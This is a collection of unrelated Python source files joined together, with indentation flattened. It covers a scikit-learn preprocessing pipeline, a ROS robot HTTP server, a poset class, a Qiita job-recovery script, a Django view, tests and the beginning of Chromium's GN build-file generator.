self.attribute_names = attribute_names
def fit(self, X, y=None):
return self
def transform(self, X):
return X[self.attribute_names].values
num_attribs = list(housing_num)
cat_attribs = ['ocean_proximity']
num_pipeline = Pipeline([
('selector', DataFrameSelector(num_attribs)),
('imputer', Imputer(strategy="median")),
('attribs_adder', CombinedAttributesAdder()),
('std_scaler', StandardScaler()),
])
cat_pipeline = Pipeline([
('selector', DataFrameSelector(cat_attribs)),
('label_binarizer', LabelBinarizer()),
])
full_pipeline = FeatureUnion(transformer_list=[
('num_pipeline', num_pipeline),
('cat_pipeline', cat_pipeline),
])
housing_prepared = full_pipeline.fit_transform(housing)
pprint.pprint(housing)
pprint.pprint(housing_prepared.shape)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2010 W-Mark Kubacki; wmark@hurrikane.de
#
__all__ = []
|
#!/usr/bin/env python
import http.server
import socketserver
import threading
import rospy
import robot_resource.robot_resource as rs
from sensor_msgs.msg import Image
from sensor_msgs.msg import NavSatFix
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/robotInfo":
rs.GET_robot_info(self)
elif self.path == "/robotStatus":
rs.GET_robot_status(self)
elif self.path == "/leftCameraFrame":
rs.GET_left_camera_frame(self)
#return http.server.SimpleHTTPRequestHandler.do_GET(self)
def main():
# Init ROS.
rospy.init_node('http_server', anonymous=True)
# Get params.
statek_name = rospy.get_param("~statek_name", "statek")
left_camera_topic = rospy.get_param("~left_camera_topic", "/" + statek_name + "/stereo/left/image_rect_color")
gps_topic = rospy.get_param("~gps_topic", "/" + statek_name + "/gps/fix")
# Set params to robot resource.
rs.ROS_set_robot_info(statek_name)
# Init subscribers.
rospy.Subscriber(left_camera_topic, Image, rs.ROS_camera_frame_callback, queue_size=1)
rospy.Subscriber(gps_topic, NavSatFix, rs.ROS_gps_fix_callback, queue_size=1)
PORT = 1337
handler = RequestHandler
httpd = socketserver.TCPServer(("", PORT), handler)
http_thread = threading.Thread(name='http_thread', target=httpd.serve_forever)
http_thread.start()
while not rospy.is_shutdown():
pass
httpd.shutdown()
http_thread.join()
if __name__ == '__main__':
main() |
import itertools as itr
import causaldag as cd
from collections import defaultdict
from copy import deepcopy
class IntransitiveParentError(Exception):
def __init__(self, i, j):
message = f"The relation {i}<{j} cannot be added since there is a k s.t. k<{i} but k is not <{j}"
super().__init__(message)
class IntransitiveChildrenError(Exception):
def __init__(self, i, j):
message = f"The relation {i}<{j} cannot be added since there is a k s.t. {j}<k but {i} is not <k"
super().__init__(message)
#def visit_forward(dag, node, stack, visited, ancestor_dict):
# #Update node's ancestors
# ancestor_dict[node].update(stack)
# if(node not in visited):
# visited.add(node)
# stack.append(node)
# for child in dag._children[node]:
# visit_forward(dag, child, stack, visited, ancestor_dict)
# stack.pop(node)
#
#def visit_backward(dag, node, stack, visited, descendant_dict):
# #Update node's ancestors
# descendant_dict[node].update(stack)
# if(node not in visited):
# visited.add(node)
# stack.append(node)
# for parent in dag._parnts[node]:
# visit_backward(dag, parent, stack, visited, descendant_dict)
# stack.pop(node)
#def get_updated_ancestry_relations(dag):
# """updates ancestors and descendants relations of all nodes in poset based on dag"""
# sorted_nodes = dag.topological_sort()
# #Run DFS forward
# ancestor_dict = defaultdict(set)
# visited = set()
# stack = []
# for node in sorted_nodes:
# visit_forward(dag, node, stack, visited, ancestor_dict)
# #Run DFS backward
# descendant_dict = defaultdict(set)
# visited = set()
# stack = []
# for node in reversed(sorted_nodes):
# visit_backward(dag, node, stack, visited, descendant_dict)
# return ancestor_dict,descendant_dict
class Poset:
def __init__(self, nodes):
"""
Invariant: the underlying DAG should remain a Hasse diagram,
i.e. i->j implies there is no path i->k->...->j
"""
self.underlying_dag = cd.DAG(nodes=nodes)
self._ancestors = defaultdict(set)
self._descendants = defaultdict(set)
self._num_relations = 0
def copy(self):
p = Poset(self.underlying_dag.nodes)
p.underlying_dag = self.underlying_dag.copy()
p._ancestors = deepcopy(self._ancestors)
p._descendants = deepcopy(self._descendants)
p._num_relations = self._num_relations
return p
@classmethod
def from_dag(cls, dag):
p = Poset(dag.nodes)
d = dag.copy()
while d.nodes:
for i in d.sources():
for j in d.downstream(i):
p.add_covering_relation(i, j)
d.remove_node(i, ignore_error = True)
full_dag = p.get_dag_transitive_closure()
p.underlying_dag = full_dag
return p
def __str__(self):
return str(self.underlying_dag._arcs)
def __hash__(self):
return hash((frozenset(self.underlying_dag._arcs), frozenset(self.underlying_dag._nodes)))
def less_than(self, i, j):
"""is i < j?"""
return i in self._ancestors[j]
def greater_than(self, i, j):
"""is i > j?"""
return i in self._descendants[j]
def incomparable(self, i, j):
return (not self.less_than(i, j)) and (not self.greater_than(i, j))
def get_smaller(self, i):
return self._ancestors[i].copy()
@property
def num_relations(self):
return self._num_relations
@property
def size(self):
return len(self.underlying_dag.nodes)
# def add_covering_relations(self, S):
# for e in S:
# self.underlying_dag.add_arc(e[0], e[1])
def _add_covering_relation(self, i, j):
self.underlying_dag.add_arc(i, j)
self._descendants[i].add(j)
self._ancestors[j].add(i)
self._num_relations += 1
#def add_legitimate_relation(self, i, j, mag):
# error = True
# while(error):
# try:
# self.underlying_dag.add_arc(i,j)
# error=False
# except cd.CycleError as e:
# cycle = e.cycle
# for ind in range(len(cycle) -1): #the cycle is in i to j
# x = cycle[ind]
# y = cycle[ind+1]
# #Check if not expressed:
# if(not x==i and not y==j and not x in mag._parents[y]):
# self._flip_relation(x, y, mag)
# self._descendants[i].add(j)
# self._ancestors[j].add(i)
# self._num_relations += 1
def _add_covered_relation(self, i, j):
"""Method assumes that descendants(i).intersection(ancestors(j)) = phi, and i->j"""
self.underlying_dag.remove_arc(i,j)
self._descendants[i].remove(j)
self._ancestors[j].remove(i)
#Update underlying dag
self._num_relations -= 1
def _flip_relation(self, i, j, mag):
"""Method assumes that parents(i) + i = parents(j)"""
self.underlying_dag.remove_arc(i,j)
self._descendants[i].remove(j)
self._ancestors[j].remove(i)
error = True
while(error):
try:
self.underlying_dag.add_arc(j,i)
error=False
except cd.CycleError as e:
cycle = e.cycle
for ind in range(len(cycle) -1): #the cycle is in j to i
x = cycle[ind]
y = cycle[ind+1]
#Check if not expressed:
if(not x==j and not y==i and not x in mag._parents[y]):
self._flip_relation(x, y, mag)
self._ancestors[i].add(j)
self._descendants[j].add(i)
def add_covering_relation(self, i, j):
"""add i<j. Only allowed if it adding this relation does not imply any other relations by transitivity."""
if not self.underlying_dag._parents[i] <= self._ancestors[j]:
raise IntransitiveParentError(i, j)
if not self.underlying_dag._children[j] <= self._descendants[i]:
raise IntransitiveChildrenError(i, j)
self._add_covering_relation(i, j)
def is_total_order(self):
return all(
[not self.incomparable(e[0], e[1]) for e in set(itr.combinations(self.underlying_dag.nodes, 2))])
def get_incomparable_pairs(self):
combinations = {(i, j) for i, j in itr.combinations(self.underlying_dag.nodes, r=2) if self.incomparable(i, j)}
return combinations | set(map(reversed, combinations))
def get_ordered_pairs(self):
ordered_pairs = {(i, j) for i, j in itr.permutations(self.underlying_dag.nodes, r=2) if self.less_than(i, j)}
return ordered_pairs
# def get_covering_relations(self):
# covering_relations = []
# for e in self.underlying_dag.arcs:
# for i in self.underlying_dag.nodes:
# if i != e[0] and i != e[1]:
# if not (self.less_than(e[0], i) and self.less_than(i, e[1])):
# if not e in covering_relations:
# covering_relations.append(e)
# return covering_relations
def get_dag_transitive_closure(self):
node_set = self.underlying_dag.nodes
to_return = cd.DAG(nodes=node_set)
for e in itr.combinations(node_set, 2):
if self.less_than(e[0], e[1]):
to_return.add_arc(e[0], e[1])
elif self.less_than(e[1], e[0]):
to_return.add_arc(e[1], e[0])
return to_return
def get_covering_posets(self):
covering_posets = []
for i, j in self.get_incomparable_pairs():
parents_okay = self.underlying_dag._parents[i] <= self._ancestors[j]
children_okay = self.underlying_dag._children[j] <= self._descendants[i]
if parents_okay and children_okay:
p = self.copy()
p._add_covering_relation(i, j)
covering_posets.append(p)
return covering_posets
def get_covered_posets(self):
covered_posets = []
for i,j in self.get_ordered_pairs():
if(len(self._descendants[i].intersection(self._ancestors[j]))==0):
p = self.copy()
p._add_covered_relation(i,j)
covered_posets.append(p)
return covered_posets
def __eq__(self, other):
if self.underlying_dag.nodes != other.underlying_dag.nodes:
return False
for e in itr.combinations(self.underlying_dag.nodes, 2):
u = e[0]
v = e[1]
if self.less_than(u, v) and not other.less_than(u, v):
return False
if other.less_than(u, v) and not self.less_than(u, v):
return False
if self.greater_than(u, v) and not other.greater_than(u, v):
return False
if other.greater_than(u, v) and not self.greater_than(u, v):
return False
return True
if __name__ == '__main__':
dag = cd.DAG(arcs={(0, 1), (1, 3), (3, 4), (2, 3), (0, 3), (0, 4)})
p = Poset.from_dag(dag)
# VERBOSE = False
# empty_poset = Poset(4)
#
# visited_posets = {frozenset(empty_poset.underlying_dag._arcs)}
# queue = [empty_poset]
# while queue:
# current_poset = queue.pop(0)
# covering_posets = current_poset.get_covering_posets()
# for poset in covering_posets:
# arcs = frozenset(poset.underlying_dag._arcs)
# # if arcs == {(1, 0), (0, 2), (1, 2)}:
# # print(current_poset.underlying_dag.arcs)
# if arcs not in visited_posets:
# queue.append(poset)
# visited_posets.add(arcs)
#
# v = list(sorted(visited_posets, key=lambda p: len(p)))
# print(len(visited_posets))
# p = Poset(cd.DAG(nodes=set(range(3)), arcs={(0, 2)}))
# print([t.underlying_dag.arcs for t in p.get_covering_posets()])
# p = Poset(cd.DAG(nodes=set(range(3)), arcs={(1, 0), (0, 2)}))
# print([t.underlying_dag.arcs for t in p.get_covering_posets(verbose=True)])
|
import os
import shutil
import glob
UUID = os.getenv('UUID')
TYPE = os.getenv('TYPE')
path= TYPE+'/'+UUID+'/raw/*'
files = glob.glob(path)
os.mkdir(TYPE+'/'+UUID+"/processed/")
for file in files:
#file_path= "type-1-imaging/2020-07-28-rezaee/processed/"+ file.rsplit('/', 1)[-1]
processed_file_path= TYPE+'/'+UUID+"/processed/"+ file.rsplit('/', 1)[-1]
shutil.move(file, processed_file_path)
print('Moved',file,'to processed')
|
#!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from subprocess import check_output
from qiita_db.sql_connection import TRN
from qiita_db.processing_job import ProcessingJob
import pandas as pd
from time import sleep
from datetime import timedelta
from math import ceil
QIITA_QUEUE_LOG = '/home/qiita/qiita-queues-logs-DONT-DELETE.log'
SLEEP_TIME = 6
CHANCES = 3
SQL = """SELECT processing_job_id
FROM qiita.processing_job
JOIN qiita.processing_job_status
USING (processing_job_status_id)
WHERE processing_job_status = %s"""
def _submit_jobs(jids_to_recover, recover_type):
# we are going to split the SLEEP_TIME by CHANCES so we can ctrl-c
# ... just in case
st = int(ceil(SLEEP_TIME/CHANCES))
len_jids_to_recover = len(jids_to_recover)
for i, j in enumerate(jids_to_recover):
print('recovering %s: %d/%d' % (recover_type, len_jids_to_recover, i))
job = ProcessingJob(j)
job._set_status('in_construction')
job.submit()
for i in range(CHANCES):
print('You can ctrl-c now, iteration %d' % i)
sleep(st)
def _retrieve_queue_jobs():
qiita_jobs = [line.split()[0]
for line in check_output("qstat").decode('ascii').split("\n")
# just retriving 'qiita' and ignoring [] (ipython workers)
if 'qiita' in line and '[]' not in line and
# and private jobs
'private' not in line and
'STDIN' not in line]
qiita_jids = []
for qj in qiita_jobs:
# to retrieve info about the jobs we need to use the fullname, so
# appending .ucsd.edu
args = ["qstat", "-f", "%s.ucsd.edu" % qj]
# the name is the last string of the line and has .txt prepended
qji = [line.split()[-1].split(".")[0]
for line in check_output(args).decode('ascii').split("\n")
if 'Job_Name' in line]
qiita_jids.extend(qji)
return set(qiita_jids)
def _get_jids_to_recover(recover_type):
with TRN:
TRN.add(SQL, [recover_type])
jids = set(TRN.execute_fetchflatten())
jids_to_recover = list(jids - _retrieve_queue_jobs())
print('Total %s: %d' % (recover_type, len(jids_to_recover)))
return jids_to_recover
def _parse_queue_values(d):
max_mem = 0
max_pmem = 0
max_vmem = 0
max_wt = timedelta(hours=0, minutes=0, seconds=0)
d = d.split(',')
for dd in d:
if dd.startswith('mem'):
v = int(dd[4:-2])
if v > max_mem:
max_mem = v
elif dd.startswith('pmem'):
v = int(dd[5:-2])
if v > max_pmem:
max_pmem = v
elif dd.startswith('vmem'):
v = int(dd[5:-2])
if v > max_mem:
max_mem = v
elif dd.startswith('walltime'):
v = map(int, dd[9:].split(':'))
v = timedelta(hours=v[0], minutes=v[1], seconds=v[2])
if v > max_wt:
max_wt = v
return max_mem, max_pmem, max_vmem, max_wt
def _qiita_queue_log_parse(jids_to_recover):
df = pd.read_csv(QIITA_QUEUE_LOG, sep='\t',
index_col=None, header=None, dtype=str, names=[
'bjid', 'user', 'group', 'jid', 'session',
'resource-list', 'resource-used', 'queue', 'account',
'exit-code', 'node'])
# remove the register and empty fields to avoid errors
df = df[(df.bjid != '0') &
(~df.bjid.isnull()) &
(~df.user.isnull()) &
(df.jid != 'register.txt')]
# generate the qiita job id
df['qjid'] = df.jid.apply(lambda x: x.split('.')[0])
results = []
for jid, ddf in df.groupby('qjid'):
if jid in jids_to_recover:
vals = []
for _, r in ddf.iterrows():
vals.append({
'exit-code': r['exit-code'],
'resource-list': _parse_queue_values(r['resource-list']),
'resource-used': _parse_queue_values(r['resource-used'])})
results.append((ProcessingJob(jid), vals))
return results
def _flush_queues(recover_type):
# README 1: in theory we should be able to submit all recover_type jobs
# one after the other but in reality that's not possible. The issue
# is that a job is going to stay as running/waiting until is completed.
# Thus, we need to run complete_job first, wait for everything to finish,
# then continue with validate, then release_validators, and
# finally everything else. Note that is suggested to wait for the
# full recovery type to finish before moving to the next one
# README 2: we now have a logging file for all submitted jobs, so let's
# start checking for those that failed for system crashes or cause the
# workers were busy, error-codes: 1-2
# first start with completing jobs that are not running
jids_to_recover = _get_jids_to_recover(recover_type)
review_jobs = _qiita_queue_log_parse(jids_to_recover)
jids_review_jobs = [j.id for j, r in review_jobs
if {rr['exit-code'] for rr in r} == {'1'}]
_submit_jobs(jids_review_jobs, recover_type + '/queue_log/1')
jids_to_recover = _get_jids_to_recover(recover_type)
review_jobs = _qiita_queue_log_parse(jids_to_recover)
jids_review_jobs = [j.id for j, r in review_jobs
if {rr['exit-code'] for rr in r} == {'0'}]
_submit_jobs(jids_review_jobs, recover_type + '/queue_log/0')
jids_to_recover = _get_jids_to_recover(recover_type)
complete_job = [j for j in jids_to_recover
if ProcessingJob(j).command.name == 'complete_job']
_submit_jobs(complete_job, recover_type + '/complete_job')
# first start validators that are not running
jids_to_recover = _get_jids_to_recover(recover_type)
validate = [j for j in jids_to_recover
if ProcessingJob(j).command.name == 'Validate']
_submit_jobs(validate, recover_type + '/validate')
# then the release validator
jids_to_recover = _get_jids_to_recover(recover_type)
release_validators = [
j for j in jids_to_recover
if ProcessingJob(j).command.name == 'release_validators']
_submit_jobs(release_validators, recover_type + '/release_validators')
def qiita_recover_jobs():
# general full processing pipeline, as an example a deblur job as it yields
# two artifacts, each new line represents a new job, each idented block a
# waiting job
# -> deblur
# -> complete_job -> release_validator
# -> validate biom 1
# -> release_validator
# -> complete_job -> create artifact
# -> validate biom 2
# -> release_validator
# -> complete_job -> create artifact
# Step 1: recover jobs that are in queue status
recover_type = 'queued'
_flush_queues(recover_type)
# then we recover what's left
jids_to_recover = _get_jids_to_recover(recover_type)
_submit_jobs(jids_to_recover, recover_type)
# Step 2: recover jobs that are running, note that there are several steps
# to recover this group: 2.1. check if they have validators,
# 2.2. if so, recover validators, 2. recover failed jobs
with TRN:
recover_type = 'running'
_flush_queues(recover_type)
jids_to_recover = _get_jids_to_recover(recover_type)
# 3.1, and 3.2: checking which jobs have validators, and recover them
jobs_with_validators = []
for j in jids_to_recover:
job = ProcessingJob(j)
validators = list(job.validator_jobs)
if not validators:
jobs_with_validators.append(j)
continue
else:
# adding validators to jobs_with_validators to ignore them
# in the next code of block
for vj in validators:
jobs_with_validators.append(vj.id)
status = set([v.status for v in validators
if v.id not in _retrieve_queue_jobs()])
# if there are no status, that means that the validators weren't
# created and we should rerun from scratch (Step 4)
if not bool(status):
continue
# it multiple status in the validators, it's a complex behaivor
# and needs a case by case solution
if len(status) != 1:
print("Job '%s' has too many validators status (%d), check "
"them by hand" % (j, len(status)))
continue
status = list(status)[0]
if status == 'waiting':
print("releasing job validators: %s" % j)
try:
job.release_validators()
except Exception:
print("ERROR, releasing %s validators" % j)
sleep(SLEEP_TIME)
elif status == 'running':
_submit_jobs(validators, recover_type + ' validator, running')
elif status == 'error':
# in this case is the same process than before but we need
# to split the set in_construction and submit in 2 steps,
# however, we can still submit via _submit_jobs
for v in validators:
vjob = ProcessingJob(v)
vjob._set_status('in_construction')
_submit_jobs(validators, recover_type + ' validator, error')
else:
print("Check the status of this job %s : %s and validators"
"%s." % (j, status, validators))
jids_to_recover = set(jids_to_recover) - set(jobs_with_validators)
# Step 3: Finally, we recover all the leftover jobs
for i, j in enumerate(jids_to_recover):
job = ProcessingJob(j)
status = job.status
if status == 'waiting':
print("releasing job validators: %s" % j)
job.release_validators()
sleep(SLEEP_TIME)
elif 'running' == status:
_submit_jobs([j], 'main_job, running')
if __name__ == '__main__':
raise ValueError('This script should never be called directly but should '
'be used as a reference if we need to recover jobs, '
'see: qiita_recover_jobs')
|
#!/usr/bin/env/ python
import requests
import match_history
import sys
import csv
"""
Gets the summoner match history of a particular summoner in the
na region. If summoners outside of NA are desired, edit the
match_history and summoner_name py scripts that get called
in tandem. Basically, don't do that.
Returns: a list of matches that the summoner has played in
"""
# This takes the second argument that has been passed by
# calling the command on the terminal and gives it to
# the 'name' variable.
# The first variable is the name of the script. USELESS!
name = sys.argv[1]
def get_data(name = name):
matches = match_history.get_match_history(name = name)['matches']
matchList = list()
for match in matches:
matchDict = dict()
matchDict['_id']= match['matchId']
for key in match.keys():
if key == 'matchId':
pass
else:
matchDict[key]=match[key]
# print matchDict['_id'], matchDict
matchList.append(matchDict)
return matchList
if __name__ == "__main__":
matches = get_data(name)
with open('matches.csv', 'wb') as f:
fieldnames = matches[0].keys()
writer = csv.DictWriter(f, fieldnames = fieldnames)
writer.writeheader()
for match in matches:
writer.writerows(f) |
import logging
from mongoengine import *
from spaceone.core.locator import Locator
from spaceone.core.model.mongo_model import MongoModel
_LOGGER = logging.getLogger(__name__)
class SecretTag(EmbeddedDocument):
key = StringField(max_length=255)
value = StringField(max_length=255)
class Secret(MongoModel):
secret_id = StringField(max_length=40, generate_id='secret', unique=True)
name = StringField(max_length=255, unique_with='domain_id')
secret_type = StringField(max_length=40, choices=('CREDENTIALS',))
tags = ListField(EmbeddedDocumentField(SecretTag))
schema = StringField(max_length=40, null=True, default=None)
provider = StringField(max_length=40, null=True, default=None)
encrypted = BooleanField(default=False)
encrypt_options = DictField()
service_account_id = StringField(max_length=40, null=True, default=None)
project_id = StringField(max_length=40, null=True, default=None)
domain_id = StringField(max_length=255)
created_at = DateTimeField(auto_now_add=True)
meta = {
'updatable_fields': [
'name',
'tags',
'encrypted',
'encrypted_options',
'project_id'
],
'minimal_fields': [
'secret_id',
'name',
'secret_type',
'encrypted'
],
'change_query_keys': {
'user_projects': 'project_id'
},
'ordering': [
'name'
],
'indexes': [
'secret_id',
'secret_type',
'schema',
'provider',
'encrypted',
'service_account_id',
'project_id',
'domain_id',
('tags.key', 'tags.value')
]
}
@classmethod
def query(cls, *args, **kwargs):
change_filter = []
for condition in kwargs.get('filter', []):
key = condition.get('k') or condition.get('key')
if key == 'secret_group_id':
change_filter.append(cls._change_secret_group_id_filter(condition))
else:
change_filter.append(condition)
kwargs['filter'] = change_filter
return super().query(*args, **kwargs)
@staticmethod
def _change_secret_group_id_filter(condition):
value = condition.get('v') or condition.get('value')
operator = condition.get('o') or condition.get('operator')
map_query = {
'filter': [{
'k': 'secret_group_id',
'v': value,
'o': operator
}]
}
locator = Locator()
secret_group_map_model = locator.get_model('SecretGroupMap')
map_vos, total_count = secret_group_map_model.query(**map_query)
return {
'k': 'secret_id',
'v': list(map(lambda map_vo: map_vo.secret.secret_id, map_vos)),
'o': 'in'
}
|
from challenges.array_binary_search import __version__
from challenges.array_binary_search.array_binary_search import binary_search
def test_version():
assert __version__ == '0.1.0'
def test_number_contained_inside_list():
actual = binary_search([4,8,15,16,23,42], 15)
expected = 2
assert actual == expected
def test_number_not_contained_inside_list():
actual = binary_search([11,22,33,44,55,66,77], 88)
expected = -1
assert actual == expected
|
from blog.models import Post
from django.shortcuts import get_object_or_404, render
from .models import Work
# Create your views here.
def single(request, slug):
w = get_object_or_404(Work, slug=slug)
context = {
'w': w.to_dict(),
'news': Post.objects.order_by('-date_created').all(),
# 'referrer': 'works.index'
}
return render(request, 'works/single.html', context) |
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates build.ninja that will build GN."""
import contextlib
import errno
import optparse
import os
import platform
import re
import subprocess
import sys
import tempfile
import last_commit_position
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
REPO_ROOT = os.path.dirname(SCRIPT_DIR)
GN_ROOT = os.path.join(REPO_ROOT, 'tools', 'gn')
class Platform(object):
"""Represents a host/target platform."""
def __init__(self, platform):
self._platform = platform
if self._platform is not None:
return
self._platform = sys.platform
if self._platform.startswith('linux'):
self._platform = 'linux'
elif self._platform.startswith('darwin'):
self._platform = 'darwin'
elif self._platform.startswith('mingw'):
self._platform = 'mingw'
elif self._platform.startswith('win'):
self._platform = 'msvc'
elif self._platform.startswith('aix'):
self._platform = 'aix'
elif self._platform.startswith('fuchsia'):
self._platform = 'fuchsia'
elif self._platform.startswith('freebsd'):
self._platform = 'freebsd'
@staticmethod
def known_platforms():
return ['linux', 'darwin', 'msvc', 'aix', 'fuchsia']
def platform(self):
return self._platform
def is_linux(self):
return self._platform == 'linux'
def is_mingw(self):
return self._platform == 'mingw'
def is_msvc(self):
return self._platform == 'msvc'
def is_windows(self):
return self.is_mingw() or self.is_msvc()
def is_darwin(self):
return self._platform == 'darwin'
def is_aix(self):
return self._platform == 'aix'
def is_posix(self):
return self._platform in ['linux', 'freebsd', 'darwin', 'aix']
def windows_target_build_arch():
# Target build architecture set by vcvarsall.bat
target_arch = os.environ.get('Platform')
if target_arch in ['x64', 'x86']: return target_arch
if platform.machine().lower() in ['x86_64', 'amd64']: return 'x64'
return 'x86'
def main(argv):
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option('-d', '--debug', action='store_true',
help='Do a debug build. Defaults to release build.')
parser.add_option('--platform',
help='target platform (' +
'/'.join(Platform.known_platforms()) + ')',
choices=Platform.known_platforms())
parser.add_option('--host',
help='host platform (' +
'/'.join(Platform.known_platforms()) + ')',
choices=Platform.known_platforms())
parser.add_option('--use-lto', action='store_true',
help='Enable the use of LTO')
parser.add_option('--use-icf', action='store_true',
help='Enable the use of Identical Code Folding')
parser.add_option('--no-last-commit-position', action='store_true',
help='Do not generate last_commit_position.h.')
parser.add_option('--out-path',
help='The path to generate the build files in.')
parser.add_option('--no-strip', action='store_true',
help='Don\'t strip release build. Useful for profiling.')
options, args = parser.parse_args(argv)
if args:
parser.error('Unrecognized command line arguments: %s.' % ', '.join(args))
platform = Platform(options.platform)
if options.host:
host = Platform(options.host)
else:
host = platform
out_dir = options.out_path or os.path.join(REPO_ROOT, 'out')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
if not options.no_last_commit_position:
GenerateLastCommitPosition(host,
os.path.join(out_dir, 'tools/gn/last_commit_position.h'), 'TOOLS_GN_LAST_COMMIT_POSITION_H_')
WriteGNNinja(os.path.join(out_dir, 'build.ninja'), platform, host, options)
return 0
def GenerateLastCommitPosition(host, header, header_guard):
version = '$Format:%h$'
if version.startswith('$'):
version = last_commit_position.FetchCommitPosition('.')
last_commit_position.WriteHeader(header, header_guard, version)
def WriteGenericNinja(path, static_libraries, executables,
cc, cxx, ar, ld, platform, host, options,
cflags=[], cflags_cc=[], arflags=[],
ldflags=[], libflags=[],
include_dirs=[], solibs=[]):
ninja_header_lines = [
'cc = ' + cc,
'cxx = ' + cxx,
'ar = ' + ar,
'ld = ' + ld,
'',
'rule regen',
' command = %s ../../build/gen.py%s --out-path .' % (
sys.executable, ' -d' if options.debug else ''),
' description = Regenerating ninja files',
'',
'build build.ninja: regen',
' generator = 1',
' depfile = build.ninja.d',
'',
]
template_filename = os.path.join(SCRIPT_DIR, {
'msvc': 'build_win.ninja.template',
'darwin': 'build_mac.ninja.template',
'linux': 'build_linux.ninja.template',
'freebsd': 'build_linux.ninja.template',
'aix': 'build_aix.ninja.template',
}[platform.platform()])
with open(template_filename) as f:
ninja_template = f.read()
if platform.is_windows():
executable_ext = '.exe'
library_ext = '.lib'
object_ext = '.obj'
else:
executable_ext = ''
library_ext = '.a'
object_ext = '.o'
def escape_path_ninja(path):
return path.replace('$ ', '$$ ').replace(' ', '$ ').replace(':', '$:')
def src_to_obj(path):
return escape_path_ninja('%s' % os.path.splitext(path)[0] + object_ext)
def library_to_a(library):
return '%s%s' % (library, library_ext)
ninja_lines = []
def build_source(src_file, settings):
ninja_lines.extend([
'build %s: %s %s' % (src_to_obj(src_file),
settings['tool'],
escape_path_ninja(
os.path.join(REPO_ROOT, src_file))),
' includes = %s' % ' '.join(
['-I' + escape_path_ninja(dirname) for dirname in
include_dirs + settings.get('include_dirs', [])]),
' cflags = %s' % ' '.join(cflags + settings.get('cflags', [])),
' cflags_cc = %s' %
' '.join(cflags_cc + settings.get('cflags_cc', [])),
])
for library, settings in static_libraries.items():
for src_file in settings['sources']:
build_source(src_file, settings)
ninja_lines.append('build %s: alink_thin %s' % (
library_to_a(library),
' '.join([src_to_obj(src_file) for src_file in settings['sources']])))
ninja_lines.append(' arflags = %s' % ' '.join(arflags))
ninja_lines.append(' libflags = %s' % ' '.join(libflags))
for executable, settings in executables.items():
for src_file in settings['sources']:
build_source(src_file, settings)
ninja_lines.extend([
'build %s%s: link %s | %s' % (
executable, executable_ext,
' '.join([src_to_obj(src_file) for src_file in settings['sources']]),
' '.join([library_to_a(library) for library in settings['libs']])),
' ldflags = %s' % ' '.join(ldflags),
' solibs = %s' % ' '.join(solibs),
' libs = %s' % ' '.join(
[library_to_a(library) for library in settings['libs']]),
])
ninja_lines.append('') # Make sure the file ends with a newline.
with open(path, 'w') as f:
f.write('\n'.join(ninja_header_lines))
f.write(ninja_template)
f.write('\n'.join(ninja_lines))
with open(path + '.d', 'w') as f:
f.write('build.ninja: ' +
os.path.relpath(os.path.join(SCRIPT_DIR, 'gen.py'),
os.path.dirname(path)) + ' ' +
os.path.relpath(template_filename, os.path.dirname(path)) + '\n')
def WriteGNNinja(path, platform, host, options):
if platform.is_msvc():
cc = os.environ.get('CC', 'cl.exe')
cxx = os.environ.get('CXX', 'cl.exe')
ld = os.environ.get('LD', 'link.exe')
ar = os.environ.get('AR', 'lib.exe')
elif platform.is_aix():
cc = os.environ.get('CC', 'gcc')
cxx = os.environ.get('CXX', 'c++')
ld = os.environ.get('LD', cxx)
ar = os.environ.get('AR', 'ar -X64')
else:
cc = os.environ.get('CC', 'cc')
cxx = os.environ.get('CXX', 'c++')
ld = cxx
ar = os.environ.get('AR', 'ar')
cflags = os.environ.get('CFLAGS', '').split()
cflags_cc = os.environ.get('CXXFLAGS', '').split()
arflags = os.environ.get('ARFLAGS', '').split()
ldflags = os.environ.get('LDFLAGS', '').split()
libflags = os.environ.get('LIBFLAGS', '').split()
include_dirs = [REPO_ROOT, os.path.abspath(os.path.dirname(path))]
libs = []
if not platform.is_msvc():
if options.debug:
cflags.extend(['-O0', '-g'])
else:
cflags.append('-DNDEBUG')
cflags.append('-O3')
if options.no_strip:
cflags.append('-g')
ldflags.append('-O3')
# Use -fdata-sections and -ffunction-sections to place each function
# or data item into its own section so --gc-sections can eliminate any
# unused functions and data items.
cflags.extend(['-fdata-sections', '-ffunction-sections'])
ldflags.extend(['-fdata-sections', '-ffunction-sections'])
if platform.is_darwin():
ldflags.append('-Wl,-dead_strip')
elif not platform.is_aix():
# Garbage collection is done by default on aix.
ldflags.append('-Wl,--gc-sections')
# Omit all symbol information from the output file.
if options.no_strip is None:
if platform.is_darwin():
ldflags.append('-Wl,-S')
elif platform.is_aix():
ldflags.append('-Wl,-s')
else:
ldflags.append('-Wl,-strip-all')
# Enable identical code-folding.
if options.use_icf and not platform.is_darwin():
ldflags.append('-Wl,--icf=all')
cflags.extend([
'-D_FILE_OFFSET_BITS=64',
'-D__STDC_CONSTANT_MACROS', '-D__STDC_FORMAT_MACROS',
'-pthread',
'-pipe',
'-fno-exceptions',
'-fno-rtti',
'-fdiagnostics-color',
])
cflags_cc.extend(['-std=c++14', '-Wno-narrowing'])
if platform.is_linux():
ldflags.extend([
'-static-libstdc++',
'-Wl,--as-needed',
])
# This is needed by libc++.
libs.extend(['-ldl', '-lrt'])
elif platform.is_darwin():
min_mac_version_flag = '-mmacosx-version-min=10.9'
cflags.append(min_mac_version_flag)
ldflags.append(min_mac_version_flag)
elif platform.is_aix():
cflags_cc.append('-maix64')
ldflags.append('-maix64')
if platform.is_posix() and not platform.is_darwin():
ldflags.append('-pthread')
if options.use_lto:
cflags.extend(['-flto', '-fwhole-program-vtables'])
ldflags.extend(['-flto', '-fwhole-program-vtables'])
elif platform.is_msvc():
if not options.debug:
cflags.extend(['/O2', '/DNDEBUG', '/GL'])
libflags.extend(['/LTCG'])
ldflags.extend(['/LTCG', '/OPT:REF', '/OPT:ICF'])
cflags.extend([
'/DNOMINMAX',
'/DUNICODE',
'/DWIN32_LEAN_AND_MEAN',
